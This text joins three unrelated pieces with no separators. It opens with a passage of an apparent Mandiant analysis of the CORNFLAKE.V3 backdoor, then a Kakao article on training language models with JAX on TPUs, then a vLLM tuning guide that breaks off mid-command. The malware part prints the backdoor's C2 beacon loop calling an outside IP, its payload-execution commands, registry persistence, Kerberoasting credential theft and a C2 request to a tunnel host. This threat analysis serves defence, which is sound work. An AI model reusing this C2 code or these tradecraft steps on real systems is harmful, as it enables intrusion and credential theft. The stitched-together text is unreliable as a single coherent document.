// Define lists of hostnames and IP addresses for the command
// and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command
// and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
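For readers less familiar with this style of C2 obfuscation, the following is a generic Python illustration of repeating-key XOR encoding applied to a request body. It is not the malware's actual enc routine; the key and the sample body are invented for the example.

```python
def xor_encode(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data against a repeating key.

    XOR is symmetric, so the same function both encodes and decodes,
    which is one reason the scheme is popular for lightweight C2 obfuscation.
    """
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Example: encode a fake beacon body, then recover it with the same call.
body = b'{"host": "WIN-EXAMPLE", "user": "demo"}'
key = b"\x5a"  # invented single-byte key, for illustration only
encoded = xor_encode(body, key)
assert xor_encode(encoded, key) == body
print(encoded.hex())
```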
This request is answered by the C2 with 2 possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it. The following values are accepted by the program:
| Command | Type | Description |
| --- | --- | --- |
| 0 | EXE | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.exe and launched using the Node.js child_process.spawn() function. |
| 1 | DLL | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.dll and launched using the Node.js child_process.spawn() function as an argument to rundll32.exe. |
| 2 | JS | The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function. |
| 3 | CMD | The received payload is launched from memory as an argument to cmd.exe using the Node.js child_process.spawn() function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request. |
| 4 | Other | The payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.log. |
Table 2: CORNFLAKE.V3 supported payloads
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument to node.exe in the newly created ChromeUpdater registry key. This ensures that the malware executes upon user logon.
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines whether the host is domain-joined; this condition determines which specific reconnaissance type is executed.
Domain Joined
Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executes whoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist: to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */* to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net, writes it to disk as php.zip, and extracts its contents to the C:\Users\<User>\AppData\Roaming\php directory. The CORNFLAKE.V3 PHP sample is contained in the config.cfg file that was also dropped in the same directory and executed with the following command line arguments:
To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA%, instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2, a unique path is generated for each request, unlike the static /init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:
| Command | Type | Notes |
| --- | --- | --- |
| 0 | EXE | The decrypted content is saved to a temporary executable file (<rand_8_char>.exe) created in a random directory within the user’s %APPDATA% folder, and executed through PowerShell as a hidden process. |
| 1 | DLL | The decrypted content is saved as a <rand_8_char>.png file in a temporary directory within the user’s %APPDATA% folder. Subsequently, rundll32.exe is invoked to execute the downloaded file. |
| 2 | JS | The decrypted content is saved as a <rand_8_char>.jpg file in a temporary directory within the user’s %APPDATA% folder. The script attempts to check if Node.js is installed. If Node.js is not found or fails to install from a hardcoded URL (http://nodejs[.]org/dist/v21.7.3/node-v21.7.3-win-x64.zip), an error message is printed. If Node.js is available, the downloaded JavaScript (.jpg) file is executed using node.exe. |
| 3 | CMD | The decrypted data is executed as a provided command string via cmd.exe or powershell.exe. |
| 4 | ACTIVE | This command reports the active_cnt (stored in the $qRunq global variable) to the C2 server. This likely serves as a heartbeat or activity metric for the implant. |
| 5 | AUTORUN | The malware attempts to establish persistence by adding a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that points to the script’s PHP binary and its own path. |
| 6 | OFF | This command directly calls exit(0), which terminates the PHP script’s execution. |
| – | OTHER | If none of the specific commands match, the received data is saved as a .txt file in a temporary directory within the user’s %APPDATA% folder. |
The JavaScript payload execution functionality was retained by implementing the download of the Node.js runtime environment inside the JS command. Other notable changes include changing the DLL and JS payload file extensions to .png and .jpg to evade detection, and the addition of the ACTIVE and AUTORUN commands. However, the main functionality of the backdoor remains unchanged despite the transition from Node.js to PHP.
These changes suggest an ongoing effort by the threat actor to refine their malware against evolving security measures.
Executed Payloads
Active Directory Reconnaissance
A cmd.exe reconnaissance payload similar to the one encountered in the Node.js variant was received from the C2 server and executed. The script checks if the machine is part of an Active Directory domain and collects the following information using PowerShell:
Domain Joined
Total count of computer accounts in AD.
Domain trust relationships.
List of all Domain Controllers.
Members of the “Domain Admins” group.
User accounts configured with a Service Principal Name (SPN).
All local groups and their members
Current User name, SID, local group memberships and security privileges
Not Domain Joined
All local groups and their members
Current User name, SID, local group memberships and security privileges
WINDYTWIST.SEA Backdoor
Following the interaction with its C2 server, a DLL payload (corresponding to command 1) was received, written to disk as C:\Users\<User>\AppData\Roaming\Shift19434078G0ZrQi.png and executed using rundll32. This file was a WINDYTWIST.SEA backdoor implant configured with the following C2 servers:
This implant is a C version of the Java WINDYTWIST backdoor, which supports relaying TCP traffic, providing a reverse shell, executing commands, and deleting itself. In previous intrusions, Mandiant observed WINDYTWIST.SEA samples attempting to move laterally in the network of the infected machine.
The following process tree was observed during the infection:
This investigation highlights the collaborative nature of modern cyber threats, where UNC5518 leverages compromised websites and deceptive ClickFix lures to gain initial access. This access is then utilized by other actors like UNC5774, who deploy versatile malware such as the CORNFLAKE.V3 backdoor. The subsequent reconnaissance and credential harvesting activities we observed indicate that the attackers intend to move laterally and expand their foothold in the environment.
To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on the Google Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from an %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell is executing php.exe from an %AppData% path. This variant is characterized by the use of the -d argument, executing a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search for suspicious process activity where cmd.exe or powershell.exe are spawned as child processes from node.exe or php.exe when those executables are located in %AppData%.
Search for unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
When your messaging platform serves 49 million people – 93% of South Korea’s population – every technical decision carries enormous weight. The engineering team at Kakao faced exactly this challenge when their existing infrastructure hit critical limitations. Their solution? A strategic shift to Google Cloud TPUs using the JAX framework that not only solved their immediate scalability needs but opened new possibilities for advanced AI model development.
Kakao’s approach provides a compelling example of leveraging the high-performance array computing framework JAX for AI model development at scale. While their primary training environment was GPU-based, the team made a strategic decision to adopt the JAX stack on Google Cloud TPUs to optimize for cost and efficiency.
This work laid the groundwork for the development of their proprietary Kanana model family, and several Kanana models — including Kanana-MoE — have recently been released as open source on Hugging Face Hub.
In this post, Minho Ryu and Nayeon Kim detail Kakao’s technical journey. They cover their specific implementation details, from adapting MaxText, the JAX-based large language model framework, for custom data pipelines to their work on mixture-of-experts (MoE) model training.
Kakao’s journey by Minho and Nayeon:
As engineers at Kakao, we develop models that serve KakaoTalk, a platform supporting services that extend far beyond text. Our rich ecosystem includes chat with over 700,000 images and stickers (emojis), voice and video calls, finance, and navigation.
KakaoTalk’s massive scale and complexity demand that our language models are not only highly efficient but also excel at understanding the Korean language and are flexible enough for diverse applications. These real-world product requirements directly influenced our technical decisions and our need for a customizable training framework.
Our journey with JAX began at an important inflection point. Our existing GPU-based infrastructure was reaching power and budget capacity constraints. We had two options: expand our GPU infrastructure and maintain our existing codebase, or adopt Cloud TPUs, which offered cost-performance advantages while requiring adoption of a new toolchain. We chose Cloud TPUs, viewing the short-term investment as worthwhile for long-term cost-performance benefits, and built our stack on JAX.
We use XPK for Kubernetes cluster management, which simplifies job creation and management on GKE without requiring Kubernetes expertise. For the data pipeline, we adopted Grain due to its deterministic behavior, which is essential for the stability of long-running AI model training jobs.
We focused on adapting the MaxText framework to fit our specific research and compatibility needs. We made two key customizations to the pipeline:
1. Multi-source data blending: When we began exploring training with MaxText, it assumed a single, pre-mixed corpus. Our research requires blending different data sources — such as web text, code, and math — with specific, dynamically-adjusted weights during different training phases. To achieve this flexibility without reprocessing terabytes of data for each experiment, we implemented a solution using Grain’s mix function (a minimal sketch follows this list). This approach allows us to define blending ratios in our configuration, providing the adaptability essential for our iterative research process. We filed a PR for this feature to be supported natively in MaxText, and it has since been incorporated.
2. Token Processing for Efficiency and Compatibility: To maintain compatibility with our existing Megatron-LM pipeline and improve efficiency, we modified MaxText’s token processing logic. Our data preparation method constructs each training sequence by appending the first token of the subsequent sequence. This creates overlapping, continuous sequences, ensuring that no information is lost at the boundaries and maximizing data utilization.
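To make the blending idea concrete, here is a minimal sketch of weighted multi-source mixing using Grain’s Dataset API. The sources, weights, and exact import and method names are illustrative assumptions (APIs vary across Grain versions); this is not Kakao’s production pipeline or the MaxText integration itself.

```
# Minimal sketch of weighted multi-source blending with Grain's Dataset API.
# Sources and weights are illustrative placeholders; exact class and method
# names may differ between Grain versions.
import grain

# Toy in-memory "corpora"; real pipelines would read ArrayRecord/TFDS sources.
web_text = grain.MapDataset.source([f"web_doc_{i}" for i in range(1_000)]).shuffle(seed=0)
code = grain.MapDataset.source([f"code_doc_{i}" for i in range(1_000)]).shuffle(seed=1)
math_data = grain.MapDataset.source([f"math_doc_{i}" for i in range(1_000)]).shuffle(seed=2)

# Blend with configurable ratios, e.g. 70% web, 20% code, 10% math.
mixed = grain.MapDataset.mix([web_text, code, math_data], weights=[0.7, 0.2, 0.1])

for i in range(5):
    print(mixed[i])
```

The ratios could be read from the training configuration, which is what makes it possible to adjust the blend between training phases without reprocessing the underlying data.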
To validate our new TPU-based workflow, we trained two models. First, we trained the Kanana 2.1 billion parameter model from scratch, and the results demonstrated that our MaxText implementation achieved performance comparable to our existing GPU-based Megatron-LM pipeline at each stage. Second, we performed depth upscaling with continued pre-training from our existing 8B model to a 9.8B architecture. Both approaches succeeded and showed consistent improvements across various benchmarks, confirming that the results on GPU were effectively reproduced on TPU.
Advancing our approach: Training Mixture-of-Experts (MoE) models with MaxText
With the core pipeline validated, we began experimenting with more advanced architectures, specifically MoE models, to build inference-efficient models that maintain strong performance. Our objectives were to explore upcycling an existing dense model into an MoE structure and to evaluate the suitability of the TPU and MaxText stack for this task.
For the experiment, we upcycled our 2.1B dense model into a 13.4B parameter (2.3B active) MoE architecture with 64 experts and 8 active experts per token. We trained this model on the exact same dataset as the original dense model to isolate the impact of the architectural change. The training was performed on v5e TPUs using MaxText with Fully Sharded Data Parallelism (FSDP).
The implementation process was straightforward. We found that MaxText’s flexible design, built on Flax, Optax, and Orbax, was well-suited for the wide range of ablations required for MoE research. Specifically:
Integrated Kernels: Megablocks MoE kernels, which support optimized MoE features like Group GEMM, were already integrated into JAX.
Combining Schedules: We used the optax.join_schedules function to combine multiple learning rate schedules (e.g., warmup, constant, and annealing) into a single, custom schedule for our training run (a short sketch follows this list). This ability to combine different schedules is very useful for experimenting with different training strategies.
Code Customization: We needed to enable the load balancing loss for our sparse matmul implementation. This required inserting a single line of code in the permute function within the MoE block of MaxText to calculate the loss directly from the router logits.
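As an illustration of the schedule composition mentioned above, the following sketch joins warmup, constant, and cosine-annealing phases with optax.join_schedules. The step counts and learning-rate values are placeholders, not the settings used for Kanana training.

```
# Illustrative learning-rate schedule: warmup -> constant -> cosine annealing,
# combined with optax.join_schedules. Step counts and values are placeholders.
import optax

warmup_steps, constant_steps, decay_steps = 2_000, 50_000, 20_000
peak_lr = 3e-4

schedule = optax.join_schedules(
    schedules=[
        optax.linear_schedule(init_value=0.0, end_value=peak_lr,
                              transition_steps=warmup_steps),
        optax.constant_schedule(peak_lr),
        optax.cosine_decay_schedule(init_value=peak_lr,
                                    decay_steps=decay_steps, alpha=0.1),
    ],
    # Boundaries are the global steps at which the next schedule takes over.
    boundaries=[warmup_steps, warmup_steps + constant_steps],
)

# The combined schedule plugs directly into an optimizer, e.g. AdamW.
optimizer = optax.adamw(learning_rate=schedule)

print(schedule(0), schedule(warmup_steps), schedule(warmup_steps + constant_steps))
```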
The results showed performance improvements, particularly in code and math benchmarks, suggesting domain specialization among the experts.
Performance Evaluation
This met our objectives and further demonstrated the JAX stack’s utility for advanced model development. We are now extending this work by experimenting with shared experts and replacing initial MoE layers with dense layers, modifications which are simple to implement within the MaxText framework.
Performance improvements and key takeaways
During our work, we gained early access to Trillium TPUs. We managed the transition from v5e by changing a few parameters in our XPK cluster and workload configurations. We observed an immediate and substantial throughput increase of 2.7x across our models, along with improved cost-performance efficiency.
Based on our experience, the JAX stack on TPUs provides a comprehensive and efficient environment for AI model development. The key advantages for our team include:
Performance and scalability: The JAX and XLA combination provides just-in-time compilation, and MaxText is optimized for large-scale parallel computing with support for paradigms like SPMD and FSDP.
Customizability and control: The codebase, being pure Python and built on libraries like Flax, Optax, and Orbax, is intuitive and easy to modify. This allows us to implement custom data pipelines, training strategies, and novel architectures with minimal overhead.
Rapid feature adoption: The MaxText framework is updated quickly with features from new state-of-the-art models, allowing us to stay current with our research.
These strengths have made the JAX stack a powerful and flexible foundation for our work in training large language models at Kakao.
Build your Language Models with the JAX Ecosystem:
Kakao’s journey demonstrates how the JAX ecosystem’s modular design — including MaxText, Flax, Optax, and Orbax — enables the customization required for both production pipelines and advanced research, from tailored data blending to rapid experimentation with MoE architectures.
Our sincere thanks to Minho, Nayeon and their team for sharing their insightful engineering work. We look forward to seeing how they and other leading enterprises worldwide continue to use the JAX ecosystem to build the next generation of powerful and efficient language models.
Additional contributors include Hossein Sarshar and Ashish Narasimham.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottom-up approach to determining the best accelerator for your use case and optimizing your vLLM configuration to achieve the best and most cost-effective results possible.
Note: This guide assumes that you are familiar with GPUs, TPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal setup from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens.
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the GPU’s VRAM vLLM is allowed to pre-allocate; whatever remains after the model weights and activation workspace are accounted for goes to the KV cache. By default this is 90% in vLLM, but we generally want to set it as high as possible to maximize performance without causing OOM issues – which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
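To see how these answers translate into an engine configuration, here is a rough sketch using vLLM’s offline LLM API (the serving path exposes the same engine arguments as flags). The values simply mirror the worked example above; they are a starting point, not a tuned configuration.

```
# Rough mapping of the workload assumptions above onto vLLM engine arguments.
# Values mirror the worked example in this post, not a tuned configuration.
from vllm import LLM, SamplingParams

llm = LLM(
    model="google/gemma-3-27b-it",
    dtype="bfloat16",              # model precision
    max_model_len=2000,            # maximum total sequence length we must support
    gpu_memory_utilization=0.95,   # lowered only if OOM occurs
    enable_prefix_caching=True,    # we expect roughly a 50% prefix-cache hit rate
    tensor_parallel_size=1,        # 1 for a single H100/A100; 4 for 4xL4 or v6e-4
)

outputs = llm.generate(
    ["Summarize the benefits of prefix caching in one sentence."],
    SamplingParams(max_tokens=200),  # ~200 output tokens per request on average
)
print(outputs[0].outputs[0].text)
```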
Selecting Accelerators (GPU/TPU)
We live in a world of resource scarcity! What does this mean for your use case? You could probably get the best possible latency and throughput by using the most up-to-date hardware – but as an engineer, it makes no sense to do this when you can achieve your requirements at a better price/performance point.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the following Calculate Memory Requirements section.
The following options require different Tensor Parallelism (TP) configurations depending on their total VRAM. Please see the next section for an explanation of Tensor Parallelism.
GPU Options
L4 GPUs
g2-standard-48 instance provides 4xL4 GPUs with 96 GB of GDDR6
TP = 4
A100 GPUs
a2-ultragpu-1g instance provides 1xA100 GPU with 80 GB of HBM
TP = 1
H100 GPUs
a3-highgpu-1g instance provides 1xH100 GPU with 80 GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory (model weights, activations, and overhead) and KV cache memory.
model_weight is equal to the number of parameters multiplied by the bytes per parameter (a constant determined by the data type/precision)
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
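As a sanity check, the ~57 GB figure can be reproduced with a quick back-of-the-envelope calculation. In the sketch below, the KV-cache shape parameters (layer count, KV heads, head dimension) are assumed illustrative values rather than numbers taken from the model card, so treat the output as an estimate and consult the model’s config for exact figures.

```
# Back-of-the-envelope VRAM estimate for serving gemma-3-27b-it in BF16.
# The KV-cache shape parameters below are illustrative assumptions; check the
# model's config.json for exact layer/head counts before relying on them.
BYTES_PER_PARAM = 2            # bfloat16
params = 27e9

model_weight_gb = params * BYTES_PER_PARAM / 1e9           # ~54 GB
non_torch_gb = 1.0                                          # overhead buffer
activation_peak_gb = 1.0                                    # rough single-batch estimate

# KV cache per token = 2 (K and V) * layers * kv_heads * head_dim * bytes
layers, kv_heads, head_dim = 62, 16, 128                    # assumed values
kv_bytes_per_token = 2 * layers * kv_heads * head_dim * BYTES_PER_PARAM
max_seq_len, batch_size = 2000, 1
kv_cache_gb = kv_bytes_per_token * max_seq_len * batch_size / 1e9   # ~1 GB

total_gb = model_weight_gb + non_torch_gb + activation_peak_gb + kv_cache_gb
print(f"minimum VRAM needed: ~{total_gb:.0f} GB")           # ~57 GB at batch_size=1
```

Increasing batch_size in this calculation shows how quickly the KV cache comes to dominate memory use at the batch sizes of 128 to 512 sequences discussed above.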
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of splitting a large model across multiple accelerators (GPU/TPU) so that the model can fit on the available hardware. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPUs because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM per chip respectively, as mentioned above, so multiple chips are required to support the model size. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead, while our 1xH100 instance does not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates (4xL4, 1xA100-80GB, 1xH100-80GB, TPU v5e-8, TPU v6e-4), it is time to see the best level of performance we can achieve across each potential setup. We will only cover the H100 and Trillium (v6e) benchmarking and tuning in this section – but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
H100 80GB
In your project, open the Cloud Shell and enter the following command to launch an a3-highgpu-1g instance. Be sure to update your project ID accordingly and select a zone that supports the a3-highgpu-1g machine type for which you have quota.
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail – if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh which we will need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
```
# navigate to the correct directory
cd benchmarks/auto_tune

# update the auto_tune.sh script – use your preferred script editor
nano auto_tune.sh
```
In the auto_tune.sh script, you will need to make the following updates:
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to a CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow-up server, resulting in what appears to be a hang. If either happens, edit auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than at 0.98.
Troubleshooting Note: By default, the --profile flag is currently passed to the benchmark_serving.py script. In some cases this may cause the process to hang if the GPU profiler cannot handle the large number of requests for that specific model. You can confirm this by reviewing the logs for the current run; if the logs include the following line followed by an indefinite hang, you’ve run into this problem:
```
INFO 08-13 09:15:58 [api_server.py:1170] Stopping profiler…
# Extensive wait time with only a couple of additional logs
```
If that is the case, simply remove the --profile flag from the benchmark_serving.py call in the auto_tune.sh script under the run_benchmark() function:
```
# REMOVE PROFILE FLAG IF HANG OCCURS
python3 benchmarks/benchmark_serving.py \
    --backend vllm \
    --model $MODEL \
    --dataset-name random \
    --random-input-len $adjusted_input_len \
    --random-output-len $OUTPUT_LEN \
    --ignore-eos \
    --disable-tqdm \
    --request-rate inf \
    --percentile-metrics ttft,tpot,itl,e2el \
    --goodput e2el:$MAX_LATENCY_ALLOWED_MS \
    --num-prompts 1000 \
    --random-prefix-len $prefix_len \
    --port 8004 \
    --profile &> "$bm_log"  # Remove this flag, making sure to keep the &> "$bm_log" redirect on the argument above
```
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
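Conceptually, the search performed for each parameter combination looks like the simplified sketch below. Here run_benchmark is a hypothetical stand-in for launching benchmark_serving.py at a given request rate and parsing its P99 E2E latency and throughput; it is not a function from the vLLM repository, and the candidate rates are illustrative.

```
# Simplified sketch of the per-configuration search auto_tune.sh performs.
# run_benchmark() is a hypothetical stand-in for launching benchmark_serving.py
# with a given request rate and parsing its P99 E2E latency and throughput.
MAX_LATENCY_ALLOWED_MS = 10_000

def run_benchmark(request_rate: float) -> tuple[float, float]:
    """Return (p99_e2e_latency_ms, achieved_throughput_req_per_s)."""
    raise NotImplementedError  # placeholder for the real benchmark invocation

def max_sustainable_throughput() -> float:
    # First, hit the server with an unbounded request rate.
    p99_ms, throughput = run_benchmark(request_rate=float("inf"))
    if p99_ms <= MAX_LATENCY_ALLOWED_MS:
        return throughput  # latency already within budget
    # Otherwise, step the offered request rate down until P99 latency fits;
    # the throughput measured at that rate is this configuration's maximum.
    for rate in range(30, 0, -1):  # illustrative candidate rates
        p99_ms, throughput = run_benchmark(request_rate=float(rate))
        if p99_ms <= MAX_LATENCY_ALLOWED_MS:
            return throughput
    return 0.0
```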
In the result.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and we can then take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute our benchmarking script for GPU and TPU.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
```
# Monitor creation
gcloud compute tpus queued-resources list --zone $ZONE --project $PROJECT
